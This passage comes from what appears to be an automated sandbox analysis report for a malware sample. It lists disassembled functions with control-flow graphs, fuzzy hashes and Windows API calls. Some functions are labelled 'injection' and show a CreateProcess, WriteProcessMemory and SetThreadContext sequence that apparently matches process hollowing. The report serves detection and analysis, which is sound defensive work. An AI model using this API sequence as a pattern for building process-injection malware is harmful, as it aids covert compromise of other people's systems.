7236c18 421->435 422 72330e9-72330f1 436 7233067 call 72343b0 425->436 437 7233067 call 72343c0 425->437 426->425 427 7233090-723309c 438 723309f call 7237f41 427->438 439 723309f call 7237f50 427->439 440 723309f call 7237ef9 427->440 428 723306d-723307a 430 7233130-7233137 428->430 431 7233080 428->431 429 72330a5-72330b2 429->416 432 72330b4 429->432 430->431 431->421 450 72330b7 call 72383c8 432->450 451 72330b7 call 72383d8 432->451 433 72330bd-72330c3 433->406 434->427 435->427 436->428 437->428 438->429 439->429 440->429 441->410 442->410 443->422 444->422 445->411 446->411 447->412 448->412 449->412 450->433 451->433
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'fq$4'fq$4'fq$4|kq$4|kq$$fq
                                                                                                                                                          • API String ID: 0-863915177
                                                                                                                                                          • Opcode ID: 645549bc992bb9f9e69e7a14cf0af56c847d347a2c5d04d2a433ec18f1146d64
                                                                                                                                                          • Instruction ID: 97480a688ea41ad1df6fda9a08311d71b85fff87c0119194aa919a3d9ddf2cdf
                                                                                                                                                          • Opcode Fuzzy Hash: 645549bc992bb9f9e69e7a14cf0af56c847d347a2c5d04d2a433ec18f1146d64
                                                                                                                                                          • Instruction Fuzzy Hash: BCE1DDF5B2021ACFCB18DF78D8586AE7BE6BF89610B154469E406DB3A1DF70CC418B90
                                                                                                                                                          Function 02B6CFF1 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 452 2b6cff1-2b6d08f GetCurrentProcess 456 2b6d091-2b6d097 452->456 457 2b6d098-2b6d0cc GetCurrentThread 452->457 456->457 458 2b6d0d5-2b6d109 GetCurrentProcess 457->458 459 2b6d0ce-2b6d0d4 457->459 460 2b6d112-2b6d12d call 2b6d5d9 458->460 461 2b6d10b-2b6d111 458->461 459->458 465 2b6d133-2b6d162 GetCurrentThreadId 460->465 461->460 466 2b6d164-2b6d16a 465->466 467 2b6d16b-2b6d1cd 465->467 466->467
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B6D07E
                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 02B6D0BB
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B6D0F8
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02B6D151
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                          • Opcode ID: 42b144b4251c017fabd5fc0b955df93284e8151e04b7bbd4dbfcab9e02d7c8c9
                                                                                                                                                          • Instruction ID: f51219a0683e54c4dcc517f56065e315105bdbc2b02db7f678890b7e6b0836a4
                                                                                                                                                          • Opcode Fuzzy Hash: 42b144b4251c017fabd5fc0b955df93284e8151e04b7bbd4dbfcab9e02d7c8c9
                                                                                                                                                          • Instruction Fuzzy Hash: 825159B0900349CFDB14DFA9C688BAEBBF1EF48314F248459E419A7290DB785984CF65
                                                                                                                                                          Function 02B6D000 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 474 2b6d000-2b6d08f GetCurrentProcess 478 2b6d091-2b6d097 474->478 479 2b6d098-2b6d0cc GetCurrentThread 474->479 478->479 480 2b6d0d5-2b6d109 GetCurrentProcess 479->480 481 2b6d0ce-2b6d0d4 479->481 482 2b6d112-2b6d12d call 2b6d5d9 480->482 483 2b6d10b-2b6d111 480->483 481->480 487 2b6d133-2b6d162 GetCurrentThreadId 482->487 483->482 488 2b6d164-2b6d16a 487->488 489 2b6d16b-2b6d1cd 487->489 488->489
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B6D07E
                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 02B6D0BB
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B6D0F8
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02B6D151
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                          • Opcode ID: d2b9375c58bc0580b5b3fdc7738acccc8c7e2da335fc508d7e9eedde4473501a
                                                                                                                                                          • Instruction ID: 92e7ea00341f98c3b220a912df79cc9a0b7bbdd5f62fbc07bc56d6574dcd9e60
                                                                                                                                                          • Opcode Fuzzy Hash: d2b9375c58bc0580b5b3fdc7738acccc8c7e2da335fc508d7e9eedde4473501a
                                                                                                                                                          • Instruction Fuzzy Hash: 965169B09003499FDB14DFA9CA88BAEBBF5EF48314F208459E419A7390DB785984CF65
                                                                                                                                                          Function 072513C4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 782 72513c4-72513ca 783 72513d1-7251465 782->783 784 72513cc-72513cf 782->784 786 7251467-7251471 783->786 787 725149e-72514be 783->787 784->783 786->787 788 7251473-7251475 786->788 794 72514f7-7251526 787->794 795 72514c0-72514ca 787->795 789 7251477-7251481 788->789 790 7251498-725149b 788->790 792 7251485-7251494 789->792 793 7251483 789->793 790->787 792->792 796 7251496 792->796 793->792 803 725155f-7251619 CreateProcessA 794->803 804 7251528-7251532 794->804 795->794 797 72514cc-72514ce 795->797 796->790 798 72514f1-72514f4 797->798 799 72514d0-72514da 797->799 798->794 801 72514dc 799->801 802 72514de-72514ed 799->802 801->802 802->802 805 72514ef 802->805 815 7251622-72516a8 803->815 816 725161b-7251621 803->816 804->803 806 7251534-7251536 804->806 805->798 808 7251559-725155c 806->808 809 7251538-7251542 806->809 808->803 810 7251544 809->810 811 7251546-7251555 809->811 810->811 811->811 813 7251557 811->813 813->808 826 72516b8-72516bc 815->826 827 72516aa-72516ae 815->827 816->815 829 72516cc-72516d0 826->829 830 72516be-72516c2 826->830 827->826 828 72516b0 827->828 828->826 832 72516e0-72516e4 829->832 833 72516d2-72516d6 829->833 830->829 831 72516c4 830->831 831->829 835 72516f6-72516fd 832->835 836 72516e6-72516ec 832->836 833->832 834 72516d8 833->834 834->832 837 7251714 835->837 838 72516ff-725170e 835->838 836->835 840 7251715 837->840 838->837 840->840
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07251606
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                          • Opcode ID: 9a4d1b31d8e70aa5b68bb2f16de7e3dfe993716793564c097822211195f346ca
                                                                                                                                                          • Instruction ID: 2a88ab91f370d327851ce91cd52ff9e4ea68110079a9ba0efe7a6bd5cee6ef8a
                                                                                                                                                          • Opcode Fuzzy Hash: 9a4d1b31d8e70aa5b68bb2f16de7e3dfe993716793564c097822211195f346ca
                                                                                                                                                          • Instruction Fuzzy Hash: 02A14BB1D1021EDFDF24CFA8C941BADBBB2BF48310F148569E809A7250DB749995CF91
                                                                                                                                                          Function 072513D0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 841 72513d0-7251465 844 7251467-7251471 841->844 845 725149e-72514be 841->845 844->845 846 7251473-7251475 844->846 852 72514f7-7251526 845->852 853 72514c0-72514ca 845->853 847 7251477-7251481 846->847 848 7251498-725149b 846->848 850 7251485-7251494 847->850 851 7251483 847->851 848->845 850->850 854 7251496 850->854 851->850 861 725155f-7251619 CreateProcessA 852->861 862 7251528-7251532 852->862 853->852 855 72514cc-72514ce 853->855 854->848 856 72514f1-72514f4 855->856 857 72514d0-72514da 855->857 856->852 859 72514dc 857->859 860 72514de-72514ed 857->860 859->860 860->860 863 72514ef 860->863 873 7251622-72516a8 861->873 874 725161b-7251621 861->874 862->861 864 7251534-7251536 862->864 863->856 866 7251559-725155c 864->866 867 7251538-7251542 864->867 866->861 868 7251544 867->868 869 7251546-7251555 867->869 868->869 869->869 871 7251557 869->871 871->866 884 72516b8-72516bc 873->884 885 72516aa-72516ae 873->885 874->873 887 72516cc-72516d0 884->887 888 72516be-72516c2 884->888 885->884 886 72516b0 885->886 886->884 890 72516e0-72516e4 887->890 891 72516d2-72516d6 887->891 888->887 889 72516c4 888->889 889->887 893 72516f6-72516fd 890->893 894 72516e6-72516ec 890->894 891->890 892 72516d8 891->892 892->890 895 7251714 893->895 896 72516ff-725170e 893->896 894->893 898 7251715 895->898 896->895 898->898
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07251606
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                          • Opcode ID: aa4b676205068d97bb7338269f535e3406617771f7c41a13488651f3251121e6
                                                                                                                                                          • Instruction ID: 739aed0d3ae3172272b5df176a0d222a102613f5d1ba57f82ac0c0e2410081ea
                                                                                                                                                          • Opcode Fuzzy Hash: aa4b676205068d97bb7338269f535e3406617771f7c41a13488651f3251121e6
                                                                                                                                                          • Instruction Fuzzy Hash: 7D914BB1D1021ECFDF24CF68C841BAEBBB6BF48310F148569E809A7290DB749995CF91
                                                                                                                                                          Function 02B6AD68 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 899 2b6ad68-2b6ad77 900 2b6ada3-2b6ada7 899->900 901 2b6ad79-2b6ad86 call 2b6a08c 899->901 902 2b6adbb-2b6adfc 900->902 903 2b6ada9-2b6adb3 900->903 908 2b6ad9c 901->908 909 2b6ad88 901->909 910 2b6adfe-2b6ae06 902->910 911 2b6ae09-2b6ae17 902->911 903->902 908->900 954 2b6ad8e call 2b6aff0 909->954 955 2b6ad8e call 2b6b000 909->955 910->911 912 2b6ae3b-2b6ae3d 911->912 913 2b6ae19-2b6ae1e 911->913 915 2b6ae40-2b6ae47 912->915 916 2b6ae20-2b6ae27 call 2b6a098 913->916 917 2b6ae29 913->917 914 2b6ad94-2b6ad96 914->908 918 2b6aed8-2b6af98 914->918 919 2b6ae54-2b6ae5b 915->919 920 2b6ae49-2b6ae51 915->920 922 2b6ae2b-2b6ae39 916->922 917->922 949 2b6afa0-2b6afcb GetModuleHandleW 918->949 950 2b6af9a-2b6af9d 918->950 923 2b6ae5d-2b6ae65 919->923 924 2b6ae68-2b6ae71 call 2b6a0a8 919->924 920->919 922->915 923->924 930 2b6ae73-2b6ae7b 924->930 931 2b6ae7e-2b6ae83 924->931 930->931 932 2b6ae85-2b6ae8c 931->932 933 2b6aea1-2b6aea5 931->933 932->933 935 2b6ae8e-2b6ae9e call 2b6a0b8 call 2b6a0c8 932->935 936 2b6aeab-2b6aeae 933->936 935->933 939 2b6aeb0-2b6aece 936->939 940 2b6aed1-2b6aed7 936->940 939->940 951 2b6afd4-2b6afe8 949->951 952 2b6afcd-2b6afd3 949->952 950->949 952->951 954->914 955->914
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02B6AFBE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                          • Opcode ID: 4063f03838e0a3d1155d9f12032a4ba46b37b52c4389c82c249c687974a97a93
                                                                                                                                                          • Instruction ID: d01505ac821ea1775f8347f072a82a3fac71494867ee183cae8a0ba109e06551
                                                                                                                                                          • Opcode Fuzzy Hash: 4063f03838e0a3d1155d9f12032a4ba46b37b52c4389c82c249c687974a97a93
                                                                                                                                                          • Instruction Fuzzy Hash: 467149B0A00B058FDB64DF69D04476ABBF2FF48304F10896ED486E7A40DB39E949CB91
                                                                                                                                                          Function 0723F8B0 Relevance: 1.6, Strings: 1, Instructions: 368COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 956 723f8b0-723f8c7 957 723f8d0-723f8d6 956->957 958 723f8c9-723f8ce 956->958 959 723f8d9-723f8dd 957->959 958->959 960 723f8e6-723f8ec 959->960 961 723f8df-723f8e4 959->961 962 723f8ef-723f8f3 960->962 961->962 963 723f917-723f91b 962->963 964 723f8f5-723f912 962->964 965 723f93f-723f94a 963->965 966 723f91d-723f93a 963->966 975 723fb37-723fb40 964->975 968 723f952-723f958 965->968 969 723f94c-723f94f 965->969 966->975 970 723fb43-723fb52 968->970 971 723f95e-723f96e 968->971 969->968 980 723fb54-723fb58 970->980 981 723fb59-723fb5a 970->981 978 723f993-723f9b8 971->978 979 723f970-723f98e 971->979 989 723fb00-723fb05 978->989 990 723f9be-723f9c7 978->990 986 723faf7-723fafa 979->986 980->981 982 723fb61-723fde6 981->982 983 723fb5c-723fb60 981->983 983->982 986->989 986->990 989->970 992 723fb07-723fb0a 989->992 990->970 993 723f9cd-723f9e5 990->993 995 723fb0e-723fb11 992->995 996 723fb0c 992->996 1000 723f9f7-723fa0e 993->1000 1001 723f9e7-723f9ec 993->1001 995->970 999 723fb13-723fb35 995->999 996->975 999->975 1008 723fa10 1000->1008 1009 723fa16-723fa20 1000->1009 1001->970 1003 723f9f2-723f9f5 1001->1003 1003->1000 1005 723fa25-723fa2a 1003->1005 1005->970 1011 723fa30-723fa3f 1005->1011 1008->1009 1009->989 1016 723fa41 1011->1016 1017 723fa47-723fa57 1011->1017 1016->1017 1017->970 1020 723fa5d-723fa60 1017->1020 1020->970 1022 723fa66-723fa69 1020->1022 1023 723fa6b-723fa6f 1022->1023 1024 723faba-723facc 1022->1024 1023->970 1026 723fa75-723fa7b 1023->1026 1024->986 1031 723face-723fae3 1024->1031 1029 723fa7d-723fa83 1026->1029 1030 723fa8c-723fa92 1026->1030 1029->970 1032 723fa89 1029->1032 1030->970 1033 723fa98-723faa4 1030->1033 1038 723fae5 1031->1038 1039 723faeb-723faf5 1031->1039 1032->1030 1040 723faac-723fab8 1033->1040 1038->1039 1039->989 1040->1024
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'fq
                                                                                                                                                          • API String ID: 0-2007657732
                                                                                                                                                          • Opcode ID: 577f389b7f825c6832b46c65253dea4d32c4110a33c803c93a0083e0ea8b1e4c
                                                                                                                                                          • Instruction ID: 92c5e3d14bd367350194d51c13994215b8938717b531ddab731c54056b8490a8
                                                                                                                                                          • Opcode Fuzzy Hash: 577f389b7f825c6832b46c65253dea4d32c4110a33c803c93a0083e0ea8b1e4c
                                                                                                                                                          • Instruction Fuzzy Hash: 4FE16EB4E10209DFCB45EFB8D594BAEBBB2FB88300F158069E905A7354DB319D81DB51
                                                                                                                                                          Function 02B644B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1068 2b644b4-2b659d9 CreateActCtxA 1071 2b659e2-2b65a3c 1068->1071 1072 2b659db-2b659e1 1068->1072 1079 2b65a3e-2b65a41 1071->1079 1080 2b65a4b-2b65a4f 1071->1080 1072->1071 1079->1080 1081 2b65a60-2b65a90 1080->1081 1082 2b65a51-2b65a5d 1080->1082 1086 2b65a42-2b65a4a 1081->1086 1087 2b65a92-2b65b14 1081->1087 1082->1081 1086->1080 1090 2b659cf-2b659d9 1086->1090 1090->1071 1090->1072
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 02B659C9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 2c12c952f39f58b844e42dfc68fef342af352a59f81ed146d1278fdbf954a5eb
                                                                                                                                                          • Instruction ID: b695ef2cf0daa13d4e373b4510fc5452338b06b367c6b4367c402e07cf73ff0a
                                                                                                                                                          • Opcode Fuzzy Hash: 2c12c952f39f58b844e42dfc68fef342af352a59f81ed146d1278fdbf954a5eb
                                                                                                                                                          • Instruction Fuzzy Hash: 5E41C1B0C0071DCBDB24DFA9C988B9EBBB5FF48304F6081AAD408AB251DB756945CF90
                                                                                                                                                          Function 02B6590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1091 2b6590c-2b659d9 CreateActCtxA 1093 2b659e2-2b65a3c 1091->1093 1094 2b659db-2b659e1 1091->1094 1101 2b65a3e-2b65a41 1093->1101 1102 2b65a4b-2b65a4f 1093->1102 1094->1093 1101->1102 1103 2b65a60-2b65a90 1102->1103 1104 2b65a51-2b65a5d 1102->1104 1108 2b65a42-2b65a4a 1103->1108 1109 2b65a92-2b65b14 1103->1109 1104->1103 1108->1102 1112 2b659cf-2b659d9 1108->1112 1112->1093 1112->1094
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 02B659C9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1838568790.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_2b60000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 23de699d388a7486f6a52306b018640a1d3c7a31cad683efb9483bcdf5ba55c4
                                                                                                                                                          • Instruction ID: 1a2a8e957a1625011342d3faf3eb98c81d36822c1ccfdc759d4f3ffd2c140487
                                                                                                                                                          • Opcode Fuzzy Hash: 23de699d388a7486f6a52306b018640a1d3c7a31cad683efb9483bcdf5ba55c4
                                                                                                                                                          • Instruction Fuzzy Hash: 1C41E2B1C00719CBDB24DFA9C984BDEBBB5FF48304F6085AAD408AB251DB756949CF50
                                                                                                                                                          Function 07251141 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1113 7251141-7251196 1116 72511a6-72511e5 WriteProcessMemory 1113->1116 1117 7251198-72511a4 1113->1117 1119 72511e7-72511ed 1116->1119 1120 72511ee-725121e 1116->1120 1117->1116 1119->1120
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072511D8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: fd7d68d9a20950102fa77ebaa66ca291eccae4a2f4fcedf406c4f38f7d2954c3
                                                                                                                                                          • Instruction ID: d4150f0eec723f419e3cff754350c7df16e86a9c41d9135be5cc9c2c51d7f16d
                                                                                                                                                          • Opcode Fuzzy Hash: fd7d68d9a20950102fa77ebaa66ca291eccae4a2f4fcedf406c4f38f7d2954c3
                                                                                                                                                          • Instruction Fuzzy Hash: EF2139B19103099FDB10CFA9C945BDEBBF5FF48310F10842AE918A7240C778A954DBA1
                                                                                                                                                          Function 07251148 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1124 7251148-7251196 1126 72511a6-72511e5 WriteProcessMemory 1124->1126 1127 7251198-72511a4 1124->1127 1129 72511e7-72511ed 1126->1129 1130 72511ee-725121e 1126->1130 1127->1126 1129->1130
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072511D8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: dc7825383a39165413d15aa80a68f3749e0a3bae99c0722068fc068442f50607
                                                                                                                                                          • Instruction ID: e5f425aae5ee888d76b0aae22701f34b7a85d631f5b0b8cd68d55922eb161cb5
                                                                                                                                                          • Opcode Fuzzy Hash: dc7825383a39165413d15aa80a68f3749e0a3bae99c0722068fc068442f50607
                                                                                                                                                          • Instruction Fuzzy Hash: 6E212AB191030D9FDB10CFA9C985BDEBBF5FF48310F10842AE918A7240C7789554DBA0
                                                                                                                                                          Function 07250B70 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07250BF6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: 26efb116ec5b07bfac6036e083aaeb2a662b47fa3d74f6879e0386354d6454b3
                                                                                                                                                          • Instruction ID: db56e0589bc0d0c163d3f1819b73bbc6275e4e79d1b2180da27dbd56393467a6
                                                                                                                                                          • Opcode Fuzzy Hash: 26efb116ec5b07bfac6036e083aaeb2a662b47fa3d74f6879e0386354d6454b3
                                                                                                                                                          • Instruction Fuzzy Hash: 062137B6D102098FDB10DFAAC985BEEBBF4AF48324F14842AD459A7241C7789645CFA1
                                                                                                                                                          Function 07251230 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072512B8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          • Opcode ID: 1a5cd40e482ffc9ca01c626317931f31f80db8c1a72b66a74a729d637ba37446
                                                                                                                                                          • Instruction ID: 25616e9a5a99f554ab3eb27ea436576f589acadf2fccec4114afab28fd5394b2
                                                                                                                                                          • Opcode Fuzzy Hash: 1a5cd40e482ffc9ca01c626317931f31f80db8c1a72b66a74a729d637ba37446
                                                                                                                                                          • Instruction Fuzzy Hash: 2B2136B1D00219DFDB10CFA9C985BEEBBF5FF48320F14842AE958A7250C7389540DBA0
                                                                                                                                                          Function 07250B78 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07250BF6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: 8935128254db0e444545a5a1a0ff559a46b3b287a8bff97b6719fcc66f0b50b6
                                                                                                                                                          • Instruction ID: 1868c702ea713041fdff198557475e4a518ad498d096755eaf1cd5d483b0cfe3
                                                                                                                                                          • Opcode Fuzzy Hash: 8935128254db0e444545a5a1a0ff559a46b3b287a8bff97b6719fcc66f0b50b6
                                                                                                                                                          • Instruction Fuzzy Hash: 3E2129B1D103098FDB20DFAAC985BEEBBF4EF48324F14842AD559A7241C7789945CFA1
                                                                                                                                                          Function 07251238 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072512B8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843390514.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7250000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                          • Opcode ID: 3f324f43d14621554617c40d19f3f2af5f91d4eb16344dcc709d1b73f1c0d74f
                                                                                                                                                          • Instruction ID: 0c4549dd8fefeed4baf635920fd3e66ab9790d539cff172651a9bb3ca36158da
                                                                                                                                                          • Opcode Fuzzy Hash: 3f324f43d14621554617c40d19f3f2af5f91d4eb16344dcc709d1b73f1c0d74f
